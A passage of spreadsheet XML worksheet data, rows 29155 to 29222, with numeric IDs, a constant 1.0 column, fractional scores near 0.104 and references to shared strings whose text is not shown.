      <c r="C29155" s="2" t="s">
        <v>28029</v>
      </c>
      <c r="D29155" s="2">
        <v>1.0</v>
      </c>
      <c r="E29155" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29155" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="29156" ht="15.75" customHeight="1">
      <c r="A29156" s="1">
        <v>14473.0</v>
      </c>
      <c r="B29156" s="2">
        <v>3.9520399E7</v>
      </c>
      <c r="C29156" s="2" t="s">
        <v>28030</v>
      </c>
      <c r="D29156" s="2">
        <v>1.0</v>
      </c>
      <c r="E29156" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29156" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="29157" ht="15.75" customHeight="1">
      <c r="A29157" s="1">
        <v>9074.0</v>
      </c>
      <c r="B29157" s="2">
        <v>5.5121804E7</v>
      </c>
      <c r="C29157" s="2" t="s">
        <v>28031</v>
      </c>
      <c r="D29157" s="2">
        <v>1.0</v>
      </c>
      <c r="E29157" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29157" s="2">
        <v>0.1053921568627451</v>
      </c>
    </row>
    <row r="29158" ht="15.75" customHeight="1">
      <c r="A29158" s="1">
        <v>3474.0</v>
      </c>
      <c r="B29158" s="2">
        <v>3.8364167E7</v>
      </c>
      <c r="C29158" s="2" t="s">
        <v>28032</v>
      </c>
      <c r="D29158" s="2">
        <v>1.0</v>
      </c>
      <c r="E29158" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29158" s="2">
        <v>0.1049382716049383</v>
      </c>
    </row>
    <row r="29159" ht="15.75" customHeight="1">
      <c r="A29159" s="1">
        <v>19652.0</v>
      </c>
      <c r="B29159" s="2">
        <v>5.6338851E7</v>
      </c>
      <c r="C29159" s="2" t="s">
        <v>28033</v>
      </c>
      <c r="D29159" s="2">
        <v>1.0</v>
      </c>
      <c r="E29159" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29159" s="2">
        <v>0.1048387096774194</v>
      </c>
    </row>
    <row r="29160" ht="15.75" customHeight="1">
      <c r="A29160" s="1">
        <v>9883.0</v>
      </c>
      <c r="B29160" s="2">
        <v>5.6750173E7</v>
      </c>
      <c r="C29160" s="2" t="s">
        <v>28034</v>
      </c>
      <c r="D29160" s="2">
        <v>1.0</v>
      </c>
      <c r="E29160" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29160" s="2">
        <v>0.1048387096774193</v>
      </c>
    </row>
    <row r="29161" ht="15.75" customHeight="1">
      <c r="A29161" s="1">
        <v>11488.0</v>
      </c>
      <c r="B29161" s="2">
        <v>2.2036847E7</v>
      </c>
      <c r="C29161" s="2" t="s">
        <v>28035</v>
      </c>
      <c r="D29161" s="2">
        <v>1.0</v>
      </c>
      <c r="E29161" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29161" s="2">
        <v>0.104735883424408</v>
      </c>
    </row>
    <row r="29162" ht="15.75" customHeight="1">
      <c r="A29162" s="1">
        <v>2056.0</v>
      </c>
      <c r="B29162" s="2">
        <v>3.1017905E7</v>
      </c>
      <c r="C29162" s="2" t="s">
        <v>28036</v>
      </c>
      <c r="D29162" s="2">
        <v>1.0</v>
      </c>
      <c r="E29162" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29162" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="29163" ht="15.75" customHeight="1">
      <c r="A29163" s="1">
        <v>3387.0</v>
      </c>
      <c r="B29163" s="2">
        <v>3.7958762E7</v>
      </c>
      <c r="C29163" s="2" t="s">
        <v>28037</v>
      </c>
      <c r="D29163" s="2">
        <v>1.0</v>
      </c>
      <c r="E29163" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29163" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="29164" ht="15.75" customHeight="1">
      <c r="A29164" s="1">
        <v>7513.0</v>
      </c>
      <c r="B29164" s="2">
        <v>5.1404468E7</v>
      </c>
      <c r="C29164" s="2" t="s">
        <v>28038</v>
      </c>
      <c r="D29164" s="2">
        <v>1.0</v>
      </c>
      <c r="E29164" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29164" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="29165" ht="15.75" customHeight="1">
      <c r="A29165" s="1">
        <v>12593.0</v>
      </c>
      <c r="B29165" s="2">
        <v>3.0060614E7</v>
      </c>
      <c r="C29165" s="2" t="s">
        <v>28039</v>
      </c>
      <c r="D29165" s="2">
        <v>1.0</v>
      </c>
      <c r="E29165" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29165" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="29166" ht="15.75" customHeight="1">
      <c r="A29166" s="1">
        <v>17912.0</v>
      </c>
      <c r="B29166" s="2">
        <v>5.1132652E7</v>
      </c>
      <c r="C29166" s="2" t="s">
        <v>28040</v>
      </c>
      <c r="D29166" s="2">
        <v>1.0</v>
      </c>
      <c r="E29166" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29166" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="29167" ht="15.75" customHeight="1">
      <c r="A29167" s="1">
        <v>29481.0</v>
      </c>
      <c r="B29167" s="2">
        <v>3.2453281E7</v>
      </c>
      <c r="C29167" s="2" t="s">
        <v>28041</v>
      </c>
      <c r="D29167" s="2">
        <v>1.0</v>
      </c>
      <c r="E29167" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29167" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="29168" ht="15.75" customHeight="1">
      <c r="A29168" s="1">
        <v>4278.0</v>
      </c>
      <c r="B29168" s="2">
        <v>4.1878579E7</v>
      </c>
      <c r="C29168" s="2" t="s">
        <v>28042</v>
      </c>
      <c r="D29168" s="2">
        <v>1.0</v>
      </c>
      <c r="E29168" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29168" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="29169" ht="15.75" customHeight="1">
      <c r="A29169" s="1">
        <v>8940.0</v>
      </c>
      <c r="B29169" s="2">
        <v>5.4887874E7</v>
      </c>
      <c r="C29169" s="2" t="s">
        <v>28043</v>
      </c>
      <c r="D29169" s="2">
        <v>1.0</v>
      </c>
      <c r="E29169" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29169" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="29170" ht="15.75" customHeight="1">
      <c r="A29170" s="1">
        <v>10790.0</v>
      </c>
      <c r="B29170" s="2">
        <v>1.5704491E7</v>
      </c>
      <c r="C29170" s="2" t="s">
        <v>28044</v>
      </c>
      <c r="D29170" s="2">
        <v>1.0</v>
      </c>
      <c r="E29170" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29170" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="29171" ht="15.75" customHeight="1">
      <c r="A29171" s="1">
        <v>11208.0</v>
      </c>
      <c r="B29171" s="2">
        <v>2.0066791E7</v>
      </c>
      <c r="C29171" s="2" t="s">
        <v>28045</v>
      </c>
      <c r="D29171" s="2">
        <v>1.0</v>
      </c>
      <c r="E29171" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29171" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="29172" ht="15.75" customHeight="1">
      <c r="A29172" s="1">
        <v>11451.0</v>
      </c>
      <c r="B29172" s="2">
        <v>2.1790504E7</v>
      </c>
      <c r="C29172" s="2" t="s">
        <v>28046</v>
      </c>
      <c r="D29172" s="2">
        <v>1.0</v>
      </c>
      <c r="E29172" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29172" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="29173" ht="15.75" customHeight="1">
      <c r="A29173" s="1">
        <v>20074.0</v>
      </c>
      <c r="B29173" s="2">
        <v>9025401.0</v>
      </c>
      <c r="C29173" s="2" t="s">
        <v>28047</v>
      </c>
      <c r="D29173" s="2">
        <v>1.0</v>
      </c>
      <c r="E29173" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29173" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="29174" ht="15.75" customHeight="1">
      <c r="A29174" s="1">
        <v>23835.0</v>
      </c>
      <c r="B29174" s="2">
        <v>8091843.0</v>
      </c>
      <c r="C29174" s="2" t="s">
        <v>28048</v>
      </c>
      <c r="D29174" s="2">
        <v>1.0</v>
      </c>
      <c r="E29174" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29174" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="29175" ht="15.75" customHeight="1">
      <c r="A29175" s="1">
        <v>31642.0</v>
      </c>
      <c r="B29175" s="2">
        <v>5147249.0</v>
      </c>
      <c r="C29175" s="2" t="s">
        <v>28049</v>
      </c>
      <c r="D29175" s="2">
        <v>1.0</v>
      </c>
      <c r="E29175" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29175" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="29176" ht="15.75" customHeight="1">
      <c r="A29176" s="1">
        <v>1845.0</v>
      </c>
      <c r="B29176" s="2">
        <v>2.9419018E7</v>
      </c>
      <c r="C29176" s="2" t="s">
        <v>28050</v>
      </c>
      <c r="D29176" s="2">
        <v>1.0</v>
      </c>
      <c r="E29176" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29176" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="29177" ht="15.75" customHeight="1">
      <c r="A29177" s="1">
        <v>15583.0</v>
      </c>
      <c r="B29177" s="2">
        <v>4.3440893E7</v>
      </c>
      <c r="C29177" s="2" t="s">
        <v>28051</v>
      </c>
      <c r="D29177" s="2">
        <v>1.0</v>
      </c>
      <c r="E29177" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29177" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="29178" ht="15.75" customHeight="1">
      <c r="A29178" s="1">
        <v>24330.0</v>
      </c>
      <c r="B29178" s="2">
        <v>1.0671858E7</v>
      </c>
      <c r="C29178" s="2" t="s">
        <v>28052</v>
      </c>
      <c r="D29178" s="2">
        <v>1.0</v>
      </c>
      <c r="E29178" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29178" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="29179" ht="15.75" customHeight="1">
      <c r="A29179" s="1">
        <v>33224.0</v>
      </c>
      <c r="B29179" s="2">
        <v>7264559.0</v>
      </c>
      <c r="C29179" s="2" t="s">
        <v>27973</v>
      </c>
      <c r="D29179" s="2">
        <v>1.0</v>
      </c>
      <c r="E29179" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29179" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="29180" ht="15.75" customHeight="1">
      <c r="A29180" s="1">
        <v>16751.0</v>
      </c>
      <c r="B29180" s="2">
        <v>4.7589707E7</v>
      </c>
      <c r="C29180" s="2" t="s">
        <v>28053</v>
      </c>
      <c r="D29180" s="2">
        <v>1.0</v>
      </c>
      <c r="E29180" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29180" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="29181" ht="15.75" customHeight="1">
      <c r="A29181" s="1">
        <v>17330.0</v>
      </c>
      <c r="B29181" s="2">
        <v>4.9371019E7</v>
      </c>
      <c r="C29181" s="2" t="s">
        <v>28054</v>
      </c>
      <c r="D29181" s="2">
        <v>1.0</v>
      </c>
      <c r="E29181" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29181" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="29182" ht="15.75" customHeight="1">
      <c r="A29182" s="1">
        <v>24071.0</v>
      </c>
      <c r="B29182" s="2">
        <v>9671699.0</v>
      </c>
      <c r="C29182" s="2" t="s">
        <v>28055</v>
      </c>
      <c r="D29182" s="2">
        <v>1.0</v>
      </c>
      <c r="E29182" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29182" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="29183" ht="15.75" customHeight="1">
      <c r="A29183" s="1">
        <v>26074.0</v>
      </c>
      <c r="B29183" s="2">
        <v>1.5616917E7</v>
      </c>
      <c r="C29183" s="2" t="s">
        <v>28056</v>
      </c>
      <c r="D29183" s="2">
        <v>1.0</v>
      </c>
      <c r="E29183" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29183" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="29184" ht="15.75" customHeight="1">
      <c r="A29184" s="1">
        <v>27071.0</v>
      </c>
      <c r="B29184" s="2">
        <v>2.0421752E7</v>
      </c>
      <c r="C29184" s="2" t="s">
        <v>28057</v>
      </c>
      <c r="D29184" s="2">
        <v>1.0</v>
      </c>
      <c r="E29184" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29184" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="29185" ht="15.75" customHeight="1">
      <c r="A29185" s="1">
        <v>2342.0</v>
      </c>
      <c r="B29185" s="2">
        <v>3.3041819E7</v>
      </c>
      <c r="C29185" s="2" t="s">
        <v>28058</v>
      </c>
      <c r="D29185" s="2">
        <v>1.0</v>
      </c>
      <c r="E29185" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29185" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="29186" ht="15.75" customHeight="1">
      <c r="A29186" s="1">
        <v>2344.0</v>
      </c>
      <c r="B29186" s="2">
        <v>3.3046557E7</v>
      </c>
      <c r="C29186" s="2" t="s">
        <v>28059</v>
      </c>
      <c r="D29186" s="2">
        <v>1.0</v>
      </c>
      <c r="E29186" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29186" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="29187" ht="15.75" customHeight="1">
      <c r="A29187" s="1">
        <v>9559.0</v>
      </c>
      <c r="B29187" s="2">
        <v>5.6042647E7</v>
      </c>
      <c r="C29187" s="2" t="s">
        <v>28060</v>
      </c>
      <c r="D29187" s="2">
        <v>1.0</v>
      </c>
      <c r="E29187" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29187" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="29188" ht="15.75" customHeight="1">
      <c r="A29188" s="1">
        <v>14207.0</v>
      </c>
      <c r="B29188" s="2">
        <v>3.8251644E7</v>
      </c>
      <c r="C29188" s="2" t="s">
        <v>28061</v>
      </c>
      <c r="D29188" s="2">
        <v>1.0</v>
      </c>
      <c r="E29188" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29188" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="29189" ht="15.75" customHeight="1">
      <c r="A29189" s="1">
        <v>15498.0</v>
      </c>
      <c r="B29189" s="2">
        <v>4.321053E7</v>
      </c>
      <c r="C29189" s="2" t="s">
        <v>28062</v>
      </c>
      <c r="D29189" s="2">
        <v>1.0</v>
      </c>
      <c r="E29189" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29189" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="29190" ht="15.75" customHeight="1">
      <c r="A29190" s="1">
        <v>20682.0</v>
      </c>
      <c r="B29190" s="2">
        <v>1.4443043E7</v>
      </c>
      <c r="C29190" s="2" t="s">
        <v>20766</v>
      </c>
      <c r="D29190" s="2">
        <v>1.0</v>
      </c>
      <c r="E29190" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29190" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="29191" ht="15.75" customHeight="1">
      <c r="A29191" s="1">
        <v>9595.0</v>
      </c>
      <c r="B29191" s="2">
        <v>5.6128504E7</v>
      </c>
      <c r="C29191" s="2" t="s">
        <v>28063</v>
      </c>
      <c r="D29191" s="2">
        <v>1.0</v>
      </c>
      <c r="E29191" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29191" s="2">
        <v>0.1041666666666666</v>
      </c>
    </row>
    <row r="29192" ht="15.75" customHeight="1">
      <c r="A29192" s="1">
        <v>21716.0</v>
      </c>
      <c r="B29192" s="2">
        <v>2.548306E7</v>
      </c>
      <c r="C29192" s="2" t="s">
        <v>27993</v>
      </c>
      <c r="D29192" s="2">
        <v>1.0</v>
      </c>
      <c r="E29192" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29192" s="2">
        <v>0.1041666666666666</v>
      </c>
    </row>
    <row r="29193" ht="15.75" customHeight="1">
      <c r="A29193" s="1">
        <v>33622.0</v>
      </c>
      <c r="B29193" s="2">
        <v>8350884.0</v>
      </c>
      <c r="C29193" s="2" t="s">
        <v>28064</v>
      </c>
      <c r="D29193" s="2">
        <v>1.0</v>
      </c>
      <c r="E29193" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29193" s="2">
        <v>0.1041666666666666</v>
      </c>
    </row>
    <row r="29194" ht="15.75" customHeight="1">
      <c r="A29194" s="1">
        <v>2872.0</v>
      </c>
      <c r="B29194" s="2">
        <v>3.5583853E7</v>
      </c>
      <c r="C29194" s="2" t="s">
        <v>28065</v>
      </c>
      <c r="D29194" s="2">
        <v>1.0</v>
      </c>
      <c r="E29194" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29194" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="29195" ht="15.75" customHeight="1">
      <c r="A29195" s="1">
        <v>3416.0</v>
      </c>
      <c r="B29195" s="2">
        <v>3.8132189E7</v>
      </c>
      <c r="C29195" s="2" t="s">
        <v>28066</v>
      </c>
      <c r="D29195" s="2">
        <v>1.0</v>
      </c>
      <c r="E29195" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29195" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="29196" ht="15.75" customHeight="1">
      <c r="A29196" s="1">
        <v>6611.0</v>
      </c>
      <c r="B29196" s="2">
        <v>4.9019926E7</v>
      </c>
      <c r="C29196" s="2" t="s">
        <v>28067</v>
      </c>
      <c r="D29196" s="2">
        <v>1.0</v>
      </c>
      <c r="E29196" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29196" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="29197" ht="15.75" customHeight="1">
      <c r="A29197" s="1">
        <v>11072.0</v>
      </c>
      <c r="B29197" s="2">
        <v>1.8369715E7</v>
      </c>
      <c r="C29197" s="2" t="s">
        <v>28068</v>
      </c>
      <c r="D29197" s="2">
        <v>1.0</v>
      </c>
      <c r="E29197" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29197" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="29198" ht="15.75" customHeight="1">
      <c r="A29198" s="1">
        <v>13657.0</v>
      </c>
      <c r="B29198" s="2">
        <v>3.5966476E7</v>
      </c>
      <c r="C29198" s="2" t="s">
        <v>28069</v>
      </c>
      <c r="D29198" s="2">
        <v>1.0</v>
      </c>
      <c r="E29198" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29198" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="29199" ht="15.75" customHeight="1">
      <c r="A29199" s="1">
        <v>13796.0</v>
      </c>
      <c r="B29199" s="2">
        <v>3.6604875E7</v>
      </c>
      <c r="C29199" s="2" t="s">
        <v>28070</v>
      </c>
      <c r="D29199" s="2">
        <v>1.0</v>
      </c>
      <c r="E29199" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29199" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="29200" ht="15.75" customHeight="1">
      <c r="A29200" s="1">
        <v>15523.0</v>
      </c>
      <c r="B29200" s="2">
        <v>4.329151E7</v>
      </c>
      <c r="C29200" s="2" t="s">
        <v>28071</v>
      </c>
      <c r="D29200" s="2">
        <v>1.0</v>
      </c>
      <c r="E29200" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29200" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="29201" ht="15.75" customHeight="1">
      <c r="A29201" s="1">
        <v>15659.0</v>
      </c>
      <c r="B29201" s="2">
        <v>4.3688479E7</v>
      </c>
      <c r="C29201" s="2" t="s">
        <v>28072</v>
      </c>
      <c r="D29201" s="2">
        <v>1.0</v>
      </c>
      <c r="E29201" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29201" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="29202" ht="15.75" customHeight="1">
      <c r="A29202" s="1">
        <v>16733.0</v>
      </c>
      <c r="B29202" s="2">
        <v>4.7514995E7</v>
      </c>
      <c r="C29202" s="2" t="s">
        <v>28073</v>
      </c>
      <c r="D29202" s="2">
        <v>1.0</v>
      </c>
      <c r="E29202" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29202" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="29203" ht="15.75" customHeight="1">
      <c r="A29203" s="1">
        <v>17779.0</v>
      </c>
      <c r="B29203" s="2">
        <v>5.0771304E7</v>
      </c>
      <c r="C29203" s="2" t="s">
        <v>28074</v>
      </c>
      <c r="D29203" s="2">
        <v>1.0</v>
      </c>
      <c r="E29203" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29203" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="29204" ht="15.75" customHeight="1">
      <c r="A29204" s="1">
        <v>19517.0</v>
      </c>
      <c r="B29204" s="2">
        <v>5.5955405E7</v>
      </c>
      <c r="C29204" s="2" t="s">
        <v>28075</v>
      </c>
      <c r="D29204" s="2">
        <v>1.0</v>
      </c>
      <c r="E29204" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29204" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="29205" ht="15.75" customHeight="1">
      <c r="A29205" s="1">
        <v>24044.0</v>
      </c>
      <c r="B29205" s="2">
        <v>9514485.0</v>
      </c>
      <c r="C29205" s="2" t="s">
        <v>28076</v>
      </c>
      <c r="D29205" s="2">
        <v>1.0</v>
      </c>
      <c r="E29205" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29205" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="29206" ht="15.75" customHeight="1">
      <c r="A29206" s="1">
        <v>24352.0</v>
      </c>
      <c r="B29206" s="2">
        <v>1.0717699E7</v>
      </c>
      <c r="C29206" s="2" t="s">
        <v>28077</v>
      </c>
      <c r="D29206" s="2">
        <v>1.0</v>
      </c>
      <c r="E29206" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29206" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="29207" ht="15.75" customHeight="1">
      <c r="A29207" s="1">
        <v>30691.0</v>
      </c>
      <c r="B29207" s="2">
        <v>4254876.0</v>
      </c>
      <c r="C29207" s="2" t="s">
        <v>28078</v>
      </c>
      <c r="D29207" s="2">
        <v>1.0</v>
      </c>
      <c r="E29207" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29207" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="29208" ht="15.75" customHeight="1">
      <c r="A29208" s="1">
        <v>9316.0</v>
      </c>
      <c r="B29208" s="2">
        <v>5.5575277E7</v>
      </c>
      <c r="C29208" s="2" t="s">
        <v>28079</v>
      </c>
      <c r="D29208" s="2">
        <v>1.0</v>
      </c>
      <c r="E29208" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29208" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="29209" ht="15.75" customHeight="1">
      <c r="A29209" s="1">
        <v>13881.0</v>
      </c>
      <c r="B29209" s="2">
        <v>3.6994944E7</v>
      </c>
      <c r="C29209" s="2" t="s">
        <v>28080</v>
      </c>
      <c r="D29209" s="2">
        <v>1.0</v>
      </c>
      <c r="E29209" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29209" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="29210" ht="15.75" customHeight="1">
      <c r="A29210" s="1">
        <v>19959.0</v>
      </c>
      <c r="B29210" s="2">
        <v>5.7536134E7</v>
      </c>
      <c r="C29210" s="2" t="s">
        <v>28081</v>
      </c>
      <c r="D29210" s="2">
        <v>1.0</v>
      </c>
      <c r="E29210" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29210" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="29211" ht="15.75" customHeight="1">
      <c r="A29211" s="1">
        <v>30694.0</v>
      </c>
      <c r="B29211" s="2">
        <v>4254876.0</v>
      </c>
      <c r="C29211" s="2" t="s">
        <v>28082</v>
      </c>
      <c r="D29211" s="2">
        <v>1.0</v>
      </c>
      <c r="E29211" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29211" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="29212" ht="15.75" customHeight="1">
      <c r="A29212" s="1">
        <v>31622.0</v>
      </c>
      <c r="B29212" s="2">
        <v>5144065.0</v>
      </c>
      <c r="C29212" s="2" t="s">
        <v>28083</v>
      </c>
      <c r="D29212" s="2">
        <v>1.0</v>
      </c>
      <c r="E29212" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29212" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="29213" ht="15.75" customHeight="1">
      <c r="A29213" s="1">
        <v>32698.0</v>
      </c>
      <c r="B29213" s="2">
        <v>5953884.0</v>
      </c>
      <c r="C29213" s="2" t="s">
        <v>28084</v>
      </c>
      <c r="D29213" s="2">
        <v>1.0</v>
      </c>
      <c r="E29213" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29213" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="29214" ht="15.75" customHeight="1">
      <c r="A29214" s="1">
        <v>32769.0</v>
      </c>
      <c r="B29214" s="2">
        <v>6075795.0</v>
      </c>
      <c r="C29214" s="2" t="s">
        <v>28085</v>
      </c>
      <c r="D29214" s="2">
        <v>1.0</v>
      </c>
      <c r="E29214" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29214" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="29215" ht="15.75" customHeight="1">
      <c r="A29215" s="1">
        <v>33166.0</v>
      </c>
      <c r="B29215" s="2">
        <v>7086085.0</v>
      </c>
      <c r="C29215" s="2" t="s">
        <v>28083</v>
      </c>
      <c r="D29215" s="2">
        <v>1.0</v>
      </c>
      <c r="E29215" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29215" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="29216" ht="15.75" customHeight="1">
      <c r="A29216" s="1">
        <v>33810.0</v>
      </c>
      <c r="B29216" s="2">
        <v>8868886.0</v>
      </c>
      <c r="C29216" s="2" t="s">
        <v>28086</v>
      </c>
      <c r="D29216" s="2">
        <v>1.0</v>
      </c>
      <c r="E29216" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29216" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="29217" ht="15.75" customHeight="1">
      <c r="A29217" s="1">
        <v>19773.0</v>
      </c>
      <c r="B29217" s="2">
        <v>5.6764674E7</v>
      </c>
      <c r="C29217" s="2" t="s">
        <v>28087</v>
      </c>
      <c r="D29217" s="2">
        <v>1.0</v>
      </c>
      <c r="E29217" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29217" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="29218" ht="15.75" customHeight="1">
      <c r="A29218" s="1">
        <v>2708.0</v>
      </c>
      <c r="B29218" s="2">
        <v>3.4877025E7</v>
      </c>
      <c r="C29218" s="2" t="s">
        <v>28088</v>
      </c>
      <c r="D29218" s="2">
        <v>1.0</v>
      </c>
      <c r="E29218" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29218" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="29219" ht="15.75" customHeight="1">
      <c r="A29219" s="1">
        <v>15259.0</v>
      </c>
      <c r="B29219" s="2">
        <v>4.2304302E7</v>
      </c>
      <c r="C29219" s="2" t="s">
        <v>28089</v>
      </c>
      <c r="D29219" s="2">
        <v>1.0</v>
      </c>
      <c r="E29219" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29219" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="29220" ht="15.75" customHeight="1">
      <c r="A29220" s="1">
        <v>27815.0</v>
      </c>
      <c r="B29220" s="2">
        <v>2.3318623E7</v>
      </c>
      <c r="C29220" s="2" t="s">
        <v>28090</v>
      </c>
      <c r="D29220" s="2">
        <v>1.0</v>
      </c>
      <c r="E29220" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29220" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="29221" ht="15.75" customHeight="1">
      <c r="A29221" s="1">
        <v>18941.0</v>
      </c>
      <c r="B29221" s="2">
        <v>5.4321331E7</v>
      </c>
      <c r="C29221" s="2" t="s">
        <v>28091</v>
      </c>
      <c r="D29221" s="2">
        <v>1.0</v>
      </c>
      <c r="E29221" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29221" s="2">
        <v>0.1034188034188034</v>
      </c>
    </row>
    <row r="29222" ht="15.75" customHeight="1">
      <c r="A29222" s="1">
        <v>1534.0</v>
      </c>
      <c r="B29222" s="2">
        <v>2.7515274E7</v>
      </c>
      <c r="C29222" s="2" t="s">
        <v>28092</v>
      </c>
